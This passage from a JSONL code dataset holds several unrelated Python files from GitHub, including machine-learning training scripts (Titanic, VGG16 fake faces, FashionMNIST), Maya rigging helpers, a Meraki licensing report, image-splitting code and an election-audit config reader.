data['Name'].str.len()\n print('-----------------------------------------------------')\n\n @staticmethod\n def transform_csv_create_title(data):\n data['Title'] = data.Name.str.extract(' ([A-Za-z]+)\\.', expand=False)\n data['Title'] = data['Title'].replace(['Lady', 'Countess', 'Capt', 'Col', \\\n 'Don', 'Dr', 'Major', 'Rev', 'Sir', 'Jonkheer', 'Dona'], 'Rare')\n data['Title'] = data['Title'].replace('Mlle', 'Miss')\n data['Title'] = data['Title'].replace('Ms', 'Miss')\n data['Title'] = data['Title'].replace('Mme', 'Mrs')\n title_mapping = {\"Mr\": 1, \"Miss\": 2, \"Mrs\": 3, \"Master\": 4, \"Rare\": 5}\n data['Title'] = data['Title'].map(title_mapping)\n data['Title'] = data['Title'].fillna(0)\n\n @staticmethod\n def transform_csv_categorical_values(data):\n data['Fare'] = pd.cut(data['Fare'], [0,7.911,14.455,31.01,90000]).cat.codes\n data['Age'] = pd.cut(data['Age'], [0, 10, 18, 26, 36, 50, 65, 200]).cat.codes\n\n @staticmethod\n def transform_csv_generate_missing_age(data):\n for index, row in data.iterrows():\n if math.isnan(row['Age']):\n curr_title = data.at[index, 'Title']\n curr_pclass = data.at[index, 'Pclass']\n maching_group = data.loc[\n (data[\"Title\"] == curr_title) & (data[\"Pclass\"] == curr_pclass), \"Age\"]\n mean_age = maching_group.mean()\n std_age = maching_group.std()\n normal_guess = np.random.normal(mean_age, std_age)\n data.at[index, 'Age'] = normal_guess\n data['Age'] = data['Age'].astype(int)\n\n @staticmethod\n def transform_csv_process_embarked(data):\n freq_port = data.Embarked.dropna().mode()[0]\n data['Embarked'] = data['Embarked'].fillna(freq_port)\n data['Embarked'] = data['Embarked'].astype(int)\n\n @staticmethod\n def transform_csv_postprocess(data):\n return data.drop(['FamilySize','SibSp','Parch','Name','Ticket','Cabin','PassengerId'], axis=1)\n\n @staticmethod\n def get_test_and_validation(csv_processed):\n train, test = train_test_split(csv_processed, train_size=0.80, test_size=0.20)\n batch_size = 892\n train_ds = DataframeHelper.df_to_dataset(train, batch_size=batch_size)\n val_ds = DataframeHelper.df_to_dataset(test, batch_size=batch_size)\n return train_ds, val_ds\n\n @staticmethod\n def perform_visual_analysis(data):\n plt.figure(figsize=(30, 12))\n sns.heatmap(data.corr(), vmax=0.6, square=True, annot=True)\n plt.show()\n print('-----------------------------------------------------')\n","repo_name":"nekon1987/kaggle-titanic","sub_path":"helpers/DataProcessing.py","file_name":"DataProcessing.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"16932697904","text":"import pymel.core as pmc\nimport maya.cmds as cmds\nfrom context_library import UndoOnError\nfrom nodes import ControlCurve\n\ndef build_fk_chain(targets, name='Unnamed'):\n with UndoOnError():\n previous_target = None\n controls = []\n for i, target in enumerate(targets):\n name = '_'.join([target.name(), 'CTRL'])\n ctrl = ControlCurve.create(name, 'circle')\n ctrl.rotateShape([0,0,90])\n ctrl.scaleShape([10,10,10])\n cmds.matchTransform(ctrl, target.name())\n if previous_target:\n pmc.parent(ctrl, previous_target)\n previous_target = ctrl\n ctrl.addBuffer()\n pmc.parentConstraint(ctrl, target, mo=True)\n controls.append(ctrl)\n return [controls[0].getTopBuffer()]\n\n\ndef build_ik_chain(targets, name='Unnamed'):\n with UndoOnError():\n\n start_joint = targets[0]\n pole_joint = targets[0].getChildren()[0]\n end_joint = targets[1]\n\n handle = pmc.ikHandle(sj=start_joint, ee=end_joint)[0]\n pmc.hide(handle)\n\n ik_ctrl = ControlCurve.create(name=name + '_Ik_CTRL', shapeType='circle')\n ik_ctrl.scaleShape([10,10,10])\n ik_ctrl.setTranslation(end_joint.getTranslation(worldSpace=True), worldSpace=True)\n ik_ctrl.addBuffer()\n ik_ctrl.lockTransform(scale=True, hide=True)\n pmc.orientConstraint(ik_ctrl, end_joint, mo=True)\n pmc.parent(handle, ik_ctrl)\n\n start_ctrl = ControlCurve.create(name=name + '_Base_CTRL', shapeType='circle')\n start_ctrl.scaleShape([10,10,10])\n start_ctrl.setMatrix(start_joint.getMatrix(worldSpace=True), worldSpace=True)\n start_ctrl.addBuffer()\n start_ctrl.lockTransform(rotate=True, scale=True, hide=True)\n pmc.parentConstraint(start_ctrl, start_joint, mo=True)\n\n pole_ctrl = ControlCurve.create(name=name + '_Pole_CTRL', shapeType='octohedron')\n pole_ctrl.scaleShape([10,10,10])\n pole_ctrl.setTranslation(pole_joint.getTranslation(worldSpace=True), worldSpace=True)\n pole_ctrl.addBuffer()\n pole_ctrl.lockTransform(rotate=True, scale=True, hide=True)\n pmc.poleVectorConstraint(pole_ctrl, handle)\n\n return ik_ctrl, pole_ctrl, start_ctrl\n\ndef build_quad_leg(targets, name='Unnamed'):\n with UndoOnError():\n assert len(targets) >= 2, 'Not enough valid targets for quad leg.'\n\n ik_ctrl, pole_ctrl, base_ctrl = build_ik_chain([targets[0], targets[2]], name)\n\n ik_ctrl.visibility.set(0)\n\n foot_ctrl = ControlCurve.create(name=name + '_Foot_CTRL', shapeType='cube')\n foot_ctrl.scaleShape([20,20,20])\n foot_ctrl.match(targets[-1].name(), rotation=False)\n foot_ctrl.lockTransform(scale=True, hide=True)\n foot_ctrl.addBuffer()\n\n hoc_ctrl = ControlCurve.create(name=name + '_Hoc_CTRL', shapeType='circle')\n hoc_ctrl.scaleShape([10,10,10])\n hoc_ctrl.lockTransform(translate=True, scale=True, hide=True)\n hoc_ctrl.rotateShape([0,0,90])\n hoc_ctrl.match(targets[-1].name())\n\n toe_ctrl = ControlCurve.create(name=name + '_Toe_CTRL', shapeType='circle')\n toe_ctrl.scaleShape([10, 10, 10])\n toe_ctrl.rotateShape([0,0,90])\n toe_ctrl.lockTransform(translate=True, scale=True, hide=True)\n toe_ctrl.match(targets[-1].name())\n\n pmc.parent([hoc_ctrl, toe_ctrl], foot_ctrl)\n hoc_ctrl.addBuffer()\n toe_ctrl.addBuffer()\n\n pmc.parentConstraint(hoc_ctrl, ik_ctrl, mo=True)\n pmc.parentConstraint(toe_ctrl, targets[-1], mo=True)\n\n return [ik_ctrl, pole_ctrl, base_ctrl, foot_ctrl]","repo_name":"obriencole11/mayalib","sub_path":"controls.py","file_name":"controls.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"14142788538","text":"from habana_frameworks.tensorflow import load_habana_module\r\n# tensorflow.compact.v1.disable_eager_execution()\r\nload_habana_module()\r\n\r\nimport itertools\r\nimport os\r\nimport random\r\nfrom xml.etree.ElementInclude import include\r\n\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport PIL\r\nimport tensorflow\r\n\r\nfrom IPython.display import Image, display\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nfrom tensorflow import keras\r\n# from tensorflow.keras import optimizers, Dense, Flatten, layers\r\n# from tensorflow.keras.optimizers import Adam\r\nfrom tensorflow.keras.layers import (Activation, BatchNormalization, Conv2D,\r\n Dense, Dropout, Flatten, MaxPooling2D,\r\n SeparableConv2D)\r\n# from tensorflow.keras.metrics import (categorical_crossentropy, \r\n# sparse_categorical_crossentropy)\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nfrom tensorflow.keras.applications.vgg16 import VGG16\r\nfrom tensorflow.keras.applications.vgg16 import preprocess_input\r\n\r\n\r\n# listing all local directories\r\nreal = \"Dataset/real_and_fake_face/training_real\"\r\nfake = \"Dataset/real_and_fake_face/training_fake\"\r\ndatadir = \"Dataset/real_and_fake_face\"\r\n\r\nreal_path = os.listdir(real)\r\nfake_path = os.listdir(fake)\r\n\r\ntraining_data = []\r\nIMG_SIZE = 224\r\n\r\n# Preprocessing for testing images\r\ndef load_img(path):\r\n image = cv2.imread(path)\r\n image = cv2.resize(image, (224, 224))\r\n return image[...,::-1]\r\n\r\n\r\ndef prepare(image):\r\n IMG_SIZE = 224\r\n new_array = cv2.resize(image, (IMG_SIZE, IMG_SIZE)) \r\n return new_array.reshape(-1, IMG_SIZE,IMG_SIZE,3)\r\n\r\n\r\ncategories = [\"training_real\", \"training_fake\"]\r\n\r\n# Correspondance: \r\n# 0 ——> Real (Original) Images\r\n# 1 ——> Fake (Photoshopped/Morphed) Images\r\n\r\ndef create_training_data():\r\n for category in categories:\r\n path = os.path.join(datadir, category)\r\n class_num = categories.index(category)\r\n for img in os.listdir(path):\r\n try:\r\n img_array = cv2.imread(os.path.join(path,img), cv2.IMREAD_UNCHANGED)\r\n new_array = cv2.resize(img_array,(IMG_SIZE,IMG_SIZE))\r\n training_data.append([new_array,class_num])\r\n except: pass\r\n\r\n\r\ncreate_training_data()\r\n\r\ntraining_data = np.array(training_data)\r\nprint(training_data.shape)\r\n\r\n# Randomizing the dataset\r\nnp.random.shuffle(training_data)\r\n\r\nX, y = [], []\r\n\r\nfor features,label in training_data:\r\n X.append(features)\r\n y.append(label)\r\n\r\nX = np.array(X).reshape(-1, IMG_SIZE, IMG_SIZE, 3)\r\ny = np.array(y)\r\n\r\nprint(X.shape)\r\nprint(y.shape)\r\nprint(np.unique(y, return_counts=True))\r\n# Expected Output: (array([0, 1]), array([1081, 960])) \r\n\r\nprint(y[1:10])\r\n\r\nX = X/255.0\r\n# Performing Normalization\r\n\r\n# Dataset split into training and validation groups\r\nX_train, X_test, y_train, y_test = train_test_split(\r\n X, y, test_size=0.1, random_state=42)\r\n\r\nprint(\"Shape of test_x: \", X_train.shape)\r\nprint(\"Shape of train_y: \", y_train.shape)\r\nprint(\"Shape of test_x: \", X_test.shape)\r\nprint(\"Shape of test_y: \", y_test.shape)\r\n\r\nprint(y_test[1:10])\r\nprint(np.unique(y_train, return_counts=True))\r\nprint(np.unique(y_test, return_counts=True))\r\n\r\ntrain_x = tensorflow.keras.utils.normalize(X_train, axis=1)\r\ntest_x = tensorflow.keras.utils.normalize(X_test, axis=1)\r\n\r\n# First Sequential Model\r\nmodel = tensorflow.keras.models.Sequential([\r\n tensorflow.keras.layers.Conv2D(filters=64, kernel_size=(3,3), \r\n padding=\"same\", activation='relu', input_shape= X.shape[1:]),\r\n tensorflow.keras.layers.Conv2D(filters=64, kernel_size=(3,3), \r\n padding=\"same\", activation='relu'),\r\n tensorflow.keras.layers.MaxPooling2D(pool_size=(2,2)),\r\n tensorflow.keras.layers.Conv2D(filters=64, kernel_size=(3,3), \r\n padding=\"same\", activation='relu'),\r\n tensorflow.keras.layers.Conv2D(filters=64, kernel_size=(3,3), \r\n padding=\"same\", activation='relu'),\r\n tensorflow.keras.layers.MaxPooling2D(pool_size=(2,2)),\r\n tensorflow.keras.layers.Dropout(0.25),\r\n tensorflow.keras.layers.Flatten(data_format=None),\r\n tensorflow.keras.layers.Dense(units=128, activation=tensorflow.nn.relu),\r\n tensorflow.keras.layers.Dense(units=2, activation=tensorflow.nn.softmax)\r\n])\r\n# Alternative for last layer try: model.add(Dense(units=1, activation='sigmoid'))\r\n\r\n# Customizing SGD Optimizer\r\nsgd = tensorflow.keras.optimizers.SGD(learning_rate=0.01, decay=1e-6, momentum=0.9, nesterov=True)\r\n\r\nmodel.compile(optimizer='adam',\r\n loss='sparse_categorical_crossentropy',\r\n metrics=['accuracy'])\r\n# Alternative for optimizer=sgd\r\n\r\nhist = model.fit(X_train,y_train, batch_size=20, epochs=8, validation_split=0.1)\r\n\r\nmodel.save('first_model.h5')\r\n\r\nval_loss, val_acc = model.evaluate(X_test, y_test)\r\nprint(val_loss)\r\nprint(val_acc)\r\n\r\n# Importing VGG-16 Model \r\nvgg16_model= tensorflow.keras.applications.vgg16.VGG16(\r\n include_top=True, \r\n weights='imagenet', \r\n input_tensor=None,\r\n input_shape=None, \r\n pooling=None, \r\n classes=1000,\r\n classifier_activation='softmax'\r\n)\r\n\r\nvgg16_model.summary()\r\nprint(type(vgg16_model))\r\n\r\n# VGG—16 is trained for classification of 1000 different classes, but that is not required.\r\n# Hence, we replace the last layer with one for a binary classifier.\r\n\r\n# Customizing the model\r\nmodel = Sequential()\r\n\r\nfor layer in vgg16_model.layers[:-1]: model.add(layer)\r\n# Replicating the vgg16_model, excluding the output layer, to a new Sequential model.\r\n\r\nfor layer in model.layers: layer.trainable = False\r\n# Iterating over each layer in our new Sequential model and setting them to be \r\n# non-trainable. This freezes the weights and other trainable parameters in each \r\n# layer so that they won't be updated when the fake and real face images are passed.\r\n\r\nmodel.add(Dense(units=2, activation='softmax'))\r\n# Alternative try: model.add(Dense(units=1, activation='sigmoid'))\r\n\r\n# Customizing SGD Optimizer\r\nsgd = tensorflow.keras.optimizers.SGD(learning_rate=0.01, decay=1e-6, momentum=0.9, nesterov=True)\r\n\r\nmodel.compile(optimizer='adam',\r\n loss='sparse_categorical_crossentropy',\r\n metrics=['accuracy'])\r\n# Alternative for optimizer=sgd\r\n\r\nhist = model.fit(X_train,y_train, batch_size=20, epochs = 50, validation_split=0.1)\r\n\r\nmodel.save('final_model.h5')\r\n# Download this model\r\n\r\nval_loss, val_acc = model.evaluate(X_test, y_test)\r\nprint(val_loss)\r\nprint(val_acc)\r\n# Final accuracy and loss\r\n","repo_name":"Saketspradhan/AWS-Deep-Learning-Challenge-2022","sub_path":"VGG16—training.py","file_name":"VGG16—training.py","file_ext":"py","file_size_in_byte":6829,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"7227320476","text":"'''\nMain script to gather organizations and their corresponding devices and\nlicencing status associated with expiration date\n'''\nimport os\nimport json\nimport logging\nimport sys\nimport time\nfrom dotenv import load_dotenv\nfrom prettytable import PrettyTable\nfrom mdutils.mdutils import MdUtils\nfrom meraki_functions import lic_date, table_svg, progress_bar, get_orgid_outputs\nfrom meraki_functions import iniciate_dashboard, get_licensing\n# defining logging system\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s [%(levelname)s] %(message)s\\n\",\n handlers=[\n logging.StreamHandler(sys.stdout)\n ]\n)\n# Defining your API key as a variable in source code is not recommended,\n# define a regular.env file to load variables\n\nlogging.info('Loading API_KEY to system.')\nload_dotenv()\nAPI_KEY = os.getenv('API_KEY')\nif not API_KEY:\n API_KEY = '6bec40cf957de430a6f1f2baa056b99a4fac9ea0' ### Meraki Always-On API KEY by default\n logging.warning(\"Using default Meraki Always-On API KEY, create .env file for private key.\")\n# Instead, use an environment variable as shown under the Usage section\n# @ https://github.com/meraki/dashboard-api-python/\n\n# Defining connectivity to Meraki (suppress logging since it works, Duh!)\n\ndashboard = iniciate_dashboard(API_KEY)\n\n# Gathering Org information list\nlogging.info('Gathering Organizations from Meraki via API')\nresponse = dashboard.organizations.getOrganizations()\n### MD File creation\nlogging.info('Initializing md file under outputs folder')\nmdFile = MdUtils(file_name='outputs/meraki_licensing.md')\nmdFile.new_header(level=1, title=\"Meraki Licensing Details\")\n\n### CLI pretty Table\npTable = PrettyTable()\npTable.field_names = [\"Org ID\",\n \"Client Name\",\n \"Licensing Status\",\n \"Expiration date\",\n \"licensed Devices\"]\n\n# Adapting each Org per row\ntotal_progress = len(response)\nlogging.info('Collecting licensing via API per %s company(ies)', total_progress)\n\nfor company in response:\n licensing = get_licensing(API_KEY,company[\"id\"])\n raw_equip = licensing[\"licensedDeviceCounts\"]\n equipments = json.dumps(raw_equip).replace(\",\", \"\\n\").replace(\"{\", \"\").replace(\"}\", \"\")\n pTable.add_row([company[\"id\"],\n company[\"name\"],\n licensing[\"status\"],\n lic_date(licensing[\"expirationDate\"]),\n equipments])\n company_title = f\"[{company['name']}]({company['url']})\"\n mdFile.new_header(level=2, title=company_title)\n mdFile.new_line(\"- Expiration Date: \" + lic_date(licensing[\"expirationDate\"]))\n mdFile.new_header(level=3, title=\"Allowed Devices\")\n if licensing[\"licensedDeviceCounts\"] != \"N/A\":\n for device, count in licensing[\"licensedDeviceCounts\"].items():\n title = device + \": \" + str(count)\n mdFile.new_header(level=4, title=title)\n else:\n mdFile.new_header(level=4, title=licensing[\"licensedDeviceCounts\"])\n time.sleep(1)\n progress_bar(response.index(company), total_progress -1)\n\n# Structure the current Org table\n\npTable.align = \"r\"\npTable.sortby = \"Expiration date\"\npTable.hrules = True\n\n# Providing SVG file in the outputs folder\nlogging.info('Creating SVG file from collected data')\ntable_svg(pTable, \"fullTable_licensing\")\n\n# Providing markdown file in the outputs folder\nlogging.info('Creating md file from collected data')\nmdFile.create_md_file()\n\n# Providing html markmap file in the outputs folder\nlogging.info('Creating Markmap file from md file')\nos.system('markmap --no-open outputs/meraki_licensing.md --output outputs/licensing_MindMap.html')\n\n\n\n# Getting output files for specific OrgID\nwhile True:\n desired_OrgID = input(\"\\n >>>> Please, select desired \\\nOrg ID to create files from table above: \")\n print('\\n')\n logging.info('Creating .md , SVG and markmap file for requested Org ID: %s', desired_OrgID)\n get_orgid_outputs(dashboard, desired_OrgID)\n logging.info('Created .md , SVG and markmap file for requested Org ID: %s.', desired_OrgID)\n selection = input('\\n >>>> Would you like to continue \\\nwith another Org ID SVG creation? [yes|no]: ')\n if selection.lower() == 'yes':\n continue\n break\n","repo_name":"AngelIV23/Meraki-To-MindMaps","sub_path":"meraki_api_main.py","file_name":"meraki_api_main.py","file_ext":"py","file_size_in_byte":4237,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"6949346565","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport json\n\n\ndef find_price_anomalies(results):\n '''Loop through results found by matching.py to find\n product with bad matches based on large price differences\n among the matched listings.\n\n Params:\n results (list): list of dictionaries containing all matches found.\n\n Returns:\n suspect_products (list): List of products that may have bad matches.\n '''\n suspect_products = []\n price_delta = 200.0\n\n for result in results:\n listings = result['listings']\n if len(listings) > 1:\n prices = [\n round(float(listing['price']), 2) for listing in listings\n ]\n\n prices.sort()\n min_price = prices[0]\n\n for price in prices[1:]:\n if price - min_price >= price_delta:\n suspect_products.append(result)\n break\n\n return suspect_products\n\n\ndef read_source():\n '''Read source file.\n\n Returns:\n results (list): list of result dictionaries.\n '''\n with open('results.txt') as results_file:\n return json.load(results_file)\n\nif __name__ == '__main__':\n results = read_source()\n suspects = find_price_anomalies(results)\n\n with open('tests/suspects.json', 'w') as suspects_file:\n json.dump(suspects, suspects_file, indent=4)\n","repo_name":"azamb/sortable","sub_path":"tests/anomaly_detection.py","file_name":"anomaly_detection.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"32003196948","text":"#%%\nfrom PIL import Image\nimport numpy as np\nfrom time import time\n\nfilename = '1.jpg'\n\nimg = Image.open(filename)\n\n#%%\npixdata = img.load()\n\n# 查找灰色横线y坐标\nline_y_list = []\n\nfor y in range(img.size[1]):\n if pixdata[0, y] <= (250, 250, 250) and pixdata[0, y] >= (210, 210, 210):\n line_y_list.append(y)\n\n# 裁剪掉上下灰色横线之外的部分\nimg = img.crop((0, line_y_list[0], img.size[0], line_y_list[1]))\n\n#%%\n# 去掉图片中的水印\nstart = time()\npixdata = img.load()\n\nfor y in range(img.size[1]):\n for x in range(img.size[0]):\n if len(set(pixdata[x, y])) == 1 and pixdata[x, y] <= (250, 250, 250) and pixdata[x, y] >= (220, 220, 220):\n pixdata[x, y] = (255, 255, 255)\n\nimg.show()\nprint(time() - start)\n\n#%%\nimg_l = img.convert(\"L\") # 转为灰度\npixdata_l = img_l.load()\nw, h = img_l.size\nh_list = [0] * h\n\nfor y in range(h):\n for x in range(w):\n if pixdata_l[x, y] < 250:\n h_list[y] += 1\n\nhhist = np.zeros(img_l.size, np.uint8)\nfor y in range(h):\n for x in range(h_list[y]):\n hhist[x, y] = 255\n\nImage.fromarray(hhist.T).show()\n\nimg_l.show()\n#%% 按页面高度分割图片\njpg_quality = 100\nstart = time()\nratio = 3 / 4\nw, h = img.size\npage_height = int(w / ratio)\n\ndef fill_white(page_data, page_height):\n if page_data.shape[0] < page_height:\n e_h = page_height - page_data.shape[0]\n n = np.zeros((e_h, w, 3), np.uint8) + 255\n page_data = np.vstack((page_data, n))\n return page_data\n\nimg_org = np.array(img)\nf_name = filename.split('.')[0]\n\nif img_org.shape[0] <= page_height:\n page_data = fill_white(img_org, page_height)\n img_out = Image.fromarray(page_data)\n img_out.save(f'{f_name}_out.jpg', quality=jpg_quality)\nelse:\n s_position = 0\n e_position = page_height\n has_content = True\n img_gray = np.array(img.convert(\"L\")) # 转为灰度\n lower_content = False\n upper_content = False\n s_height = 100\n f_name_index = 0\n\n while has_content:\n print(f'Position: {s_position} - {e_position}')\n area = img_gray[e_position - 10 : e_position]\n s_list = np.zeros(s_height, np.int)\n\n # 如果分页最下面10个像素高度有内容,则查找空白进行分割\n if np.count_nonzero(area <= 250) > 10:\n is_blank = False\n blank_list = []\n\n for position in range(e_position - s_height, e_position):\n black_pix = np.count_nonzero(img_gray[position] <= 250)\n if black_pix == 0 and not is_blank:\n blank_list.append(position)\n is_blank = True\n elif black_pix > 0 and is_blank:\n blank_list.append(position)\n is_blank = False\n\n if len(blank_list) % 2 == 1:\n blank_list = blank_list[:-1]\n\n blank_list = np.array(blank_list).reshape(-1, 2).tolist()\n print(blank_list)\n e_position = (blank_list[-1][1] - blank_list[-1][0]) // 2 + blank_list[-1][0]\n print(f'Change position: {s_position} - {e_position}')\n\n page_data = img_org[s_position : e_position]\n page_data = fill_white(page_data, page_height)\n img_out = Image.fromarray(page_data)\n f_name_index += 1\n img_out.save(f'{f_name}_out_{f_name_index}.jpg', quality=jpg_quality)\n\n s_position = e_position\n e_position += page_height\n if s_position > h:\n has_content = False\n\nprint(time() - start)\n#%%\nstart = time()\nratio = 3 / 4\ncut_h = int(w / ratio)\n\ncroped = img.crop((0, 0, w, cut_h))\n\nif croped.size[1] < cut_h:\n new_image = Image.new('RGB', (w, cut_h), (255, 255, 255))\n new_image.paste(croped)\n croped = new_image\n print(croped.size[1])\n\ncroped.show()\nprint(time() - start)\n\n#%%\nimg.save(filename.split('.')[0] + '_out.jpg', quality=100)","repo_name":"zrhett/learn-matplotlib","sub_path":"dd_image.py","file_name":"dd_image.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"70130640078","text":"# -*- coding: utf-8 -*-\n\n\"\"\" Implements a Class for Reading the Australian Senate Election Configuration File. \"\"\"\n\nfrom json import load\n\nfrom aus_senate_audit.constants import CONFIG_FILE_PATH\nfrom aus_senate_audit.constants import FORMAL_PREFERENCES_CSV_NUM_HEADER_LINES\n\n\nclass ConfigReader(object):\n \"\"\" Implements a class for reading the Australian senate election configuration file.\n\n :ivar str _data_file_path: The path to all Australian senate election data.\n :ivar dict _config: The Australian senate election configuration.\n\n NOTE: The configuration file is in a JSON format.\n \"\"\"\n def __init__(self, data_file_path):\n \"\"\" Initializes a :class:`ConfigReader` object.\n\n :param str data_file_path: The path to all Australian senate election data.\n \"\"\"\n self._data_file_path = data_file_path\n self._config = load(open('{}/{}'.format(data_file_path, CONFIG_FILE_PATH), 'r'))\n\n def get_config(self):\n \"\"\" Returns the configuration for the senate election.\n\n :returns: The configuration for the senate election.\n :rtype: dict\n \"\"\"\n return self._config\n\n def get_all_ballots_for_state(self, state):\n \"\"\" Returns all cast ballots for the given state.\n\n :param str state: The abbreviated name of the state to retrieve all cast ballots for.\n\n :returns: All cast ballots for the given state.\n :rtype: list\n \"\"\"\n for state_config in self._config['count']:\n if state_config['name'] == state:\n path_to_formal_preferences = state_config['aec-data']['formal-preferences']\n with open('{}/{}'.format(self._data_file_path, path_to_formal_preferences), 'r') as f:\n return [line.rstrip() for line in f][FORMAL_PREFERENCES_CSV_NUM_HEADER_LINES:]\n","repo_name":"berjc/aus-senate-audit","sub_path":"aus_senate_audit/config_reader.py","file_name":"config_reader.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20971926588","text":"import numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch.autograd import Variable\r\nimport math\r\nimport torch.nn.functional as F\r\nimport pdb\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\ndef Entropy(input_):\r\n bs = input_.size(0)\r\n epsilon = 1e-5\r\n entropy = -input_ * torch.log(input_ + epsilon)\r\n entropy = torch.sum(entropy, dim=1)\r\n return entropy \r\n\r\n\r\ndef cal_acc(loader, netF, netB, netC, flag=False):\r\n start_test = True\r\n with torch.no_grad():\r\n iter_test = iter(loader)\r\n for i in range(len(loader)):\r\n data = iter_test.next()\r\n inputs = data[0]\r\n labels = data[1]\r\n inputs = inputs.cuda()\r\n outputs = netC(netB(netF(inputs)))\r\n if start_test:\r\n all_output = outputs.float().cpu()\r\n all_label = labels.float()\r\n start_test = False\r\n else:\r\n all_output = torch.cat((all_output, outputs.float().cpu()), 0)\r\n all_label = torch.cat((all_label, labels.float()), 0)\r\n _, predict = torch.max(all_output, 1)\r\n accuracy = torch.sum(torch.squeeze(predict).float() == all_label).item() / float(all_label.size()[0])\r\n matrix = confusion_matrix(all_label, torch.squeeze(predict).float())\r\n acc = matrix.diagonal()/matrix.sum(axis=1) * 100\r\n aacc = acc.mean()\r\n aa = [str(np.round(i, 2)) for i in acc]\r\n acc = ' '.join(aa)\r\n return aacc, acc\r\n ","repo_name":"Albert0147/BAIT_SFUDA","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"29"} +{"seq_id":"9099455563","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nimport torchvision\nimport torchvision.transforms as transforms\n\ntorch.set_printoptions(linewidth=120) # display options for output\ntorch.set_grad_enabled(True) # already on by default\n\n# print(torch.__version__)\n# print(torchvision.__version__)\n\n\ndef get_num_correct(preds, labels):\n return preds.argmax(dim=1).eq(labels).sum().item()\n\n\nclass Network(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(in_channels=1, out_channels=6, kernel_size=5)\n self.conv2 = nn.Conv2d(in_channels=6, out_channels=12, kernel_size=5)\n\n self.fc1 = nn.Linear(in_features=12 * 4 * 4, out_features=120)\n self.fc2 = nn.Linear(in_features=120, out_features=60)\n self.out = nn.Linear(in_features=60, out_features=10)\n\n def forward(self, t0):\n # input layer\n t = t0\n\n # hidden conv layer\n t = F.relu(self.conv1(t))\n t = F.max_pool2d(t, kernel_size=2, stride=2)\n\n # hidden conv layer\n t = F.relu(self.conv2(t))\n t = F.max_pool2d(t, kernel_size=2, stride=2)\n\n # hidden linear layer\n t = F.relu(self.fc1(t.reshape(-1, 12 * 4 * 4)))\n\n # hidden linear layer\n t = F.relu(self.fc2(t))\n\n # output layer\n t = self.out(t)\n # t = F.softmax(t, dim=1)\n\n return t\n\n\ntrain_set = torchvision.datasets.FashionMNIST(\n root='./data/FashionMNIST', # location on disk\n train=True, # 60000 for training & 10000 for testing\n download=True, # download if it's not present at the location we specified\n transform=transforms.Compose([\n transforms.ToTensor()\n ]) # A composition of transformations that should be performed on the dataset elements.\n)\n\nnetwork = Network()\n\n# step 1: get batch from the training set\ntrain_loader = torch.utils.data.DataLoader(train_set, batch_size=100)\noptimizer = optim.Adam(network.parameters(), lr=0.01) # input the weights\n\nfor epoch in range(5): # step 7: do many epochs\n\n total_loss = 0\n total_correct = 0\n\n for batch in train_loader:\n images, labels = batch\n\n preds = network(images) # step 2: pass batch\n loss = F.cross_entropy(preds, labels) # step 3: calculate loss\n\n optimizer.zero_grad() # zero out the existing grads instead of accumulating them\n loss.backward() # step 4: calculate gradients of the loss function\n optimizer.step() # step 5: update weights using the gradients to reduce the loss\n\n total_loss += loss.item()\n total_correct += get_num_correct(preds, labels)\n\n # step 6: do these for every batch in 1 epoch\n print(\"epoch = \", epoch, \", total_correct = \", total_correct, \", loss = \", total_loss)\n\nprint(train_set)\nprint(train_set.targets)\nprint(len(train_set))\nprint(len(train_set.targets))\n\nprint(\"-\" * 50)\n\n\n@torch.no_grad()\ndef get_all_preds(model, loader):\n all_preds = torch.tensor([])\n for batch in loader:\n images, labels = batch\n\n preds = model(images)\n all_preds = torch.cat((all_preds, preds), dim=0)\n\n return all_preds\n\n\nprediction_loader = torch.utils.data.DataLoader(train_set, batch_size=10000)\ntrain_preds = get_all_preds(network, prediction_loader)\nprint(train_preds.shape)\n\nprint(train_preds.requires_grad)\nprint(train_preds.grad)\nprint(train_preds.grad_fn)\n\nprint(\"-\" * 50)\n\npreds_correct = get_num_correct(train_preds, train_set.targets)\nprint(\"total correct: \", preds_correct)\nprint(\"accuracy: \", preds_correct / len(train_set))\n\nprint(\"-\" * 50)\n\nstacked = torch.stack((train_set.targets, train_preds.argmax(dim=1)), dim=1)\nprint(stacked.shape) # torch.Size([60000, 2])\nprint(stacked) # true label & predicted label\n# print(stacked[0].tolist()) # [9, 9]\n\nprint(\"-\" * 50)\n\ncmt = torch.zeros(10, 10, dtype=torch.int32)\n# print(cmt)\n\nfor p in stacked:\n true_label, predicted_label = p.tolist()\n cmt[true_label, predicted_label] = cmt[true_label, predicted_label] + 1\n\nprint(cmt)\n\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix\nfrom resources.plotcm import plot_confusion_matrix\n\nprint(\"-\" * 50)\n\ncm = confusion_matrix(train_set.targets, train_preds.argmax(dim=1))\nprint(type(cm))\nprint(cm)\n\nprint(\"-\" * 50)\n\nnames = ('T-shirt/top', 'Trouser', 